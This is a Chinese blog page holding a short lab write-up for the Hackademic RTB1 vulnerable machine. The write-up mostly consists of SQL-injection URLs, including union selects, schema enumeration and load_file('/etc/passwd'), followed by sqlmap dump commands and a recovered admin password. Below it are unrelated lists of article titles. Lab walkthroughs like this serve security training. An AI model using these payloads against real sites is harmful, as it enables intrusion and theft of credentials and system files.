一、信息收集

信息收集

http://192.168.111.132/Hackademic_RTB1/?cat=1

http://192.168.111.132/Hackademic_RTB1/?cat=1%27

http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%201

http://192.168.111.132/Hackademic_RTB1/?cat=1%20order%20by%206

http://192.168.111.132/Hackademic_RTB1/?cat=1%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=1%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,2,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1%20and%201=2%20union%20select%201,@@version,3,4,5

http://192.168.111.132/Hackademic_RTB1/?cat=1
and 1=2 union select 1,group_concat(schema_name),3,4,5 from
information_schema.schemata

http://192.168.111.132/Hackademic_RTB1/?cat=1 and 1=2 union select 1,load_file(‘/etc/passwd’),3,4,5 from mysql.user

或者sqlmap

sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs

sqlmap -u http://192.168.111.132/Hackademic_RTB1/?cat=1 --dbs --batch --dump

使用md5进行解密

账户登录GeorgeMiller权限最高

GeorgeMiller         q1w2e3

进入后台页面

蚁剑连接并且反弹到kali

上传文件

编译失败

继续寻找

最新文章

1. rails程序文件名命名规范
2. Sphinx学习之sphinx的安装篇
3. Python学习（8）字符串
4. opencv 金字塔图像分割
5. SQL JOB
6. hadoop拾遗（一）---- 避免切分map文件
7. CSS 3 属性学习大纲
8. Oracle中的二进制、八进制、十进制、十六进制相互转换函数
9. 201521123092《java程序设计》第四周学习总结
10. 转 c#性能优化秘密
11. python基础第一天 3.27
12. 8 Oracle语句
13. 分治法——快速排序(quicksort)
14. [UE4]Button
15. [UFLDL] Generative Model
16. vue-cli3快速创建项目
17. YQCB冲刺第二周第三天
18. OpenGL OBJ模型加载.
19. Super Star(最小球覆盖)
20. C#通过rdp账密直接打开远程桌面

热门文章

1. 如何使用 jest 和 lint-staged 只检测发生改动的文件
2. Docker与k8s的恩怨情仇（二）—用最简单的技术实现“容器”
3. 聊聊 Feign 的实现原理
4. 机械革命z2安装ubuntu20
5. Vue（12）组件的组织结构和组件注册
6. vue中$nextTick详细讲解保证你一看就明白
7. 27、Tomcat服务的安装与配置
8. 【luogu P3807】【模板】卢卡斯定理/Lucas 定理（含 Lucas 定理证明）
9. k8s结合jumpserver做kubectl权限控制 用户在多个namespaces的访问权限 rbac权限控制
10. Flask（7）- request 对象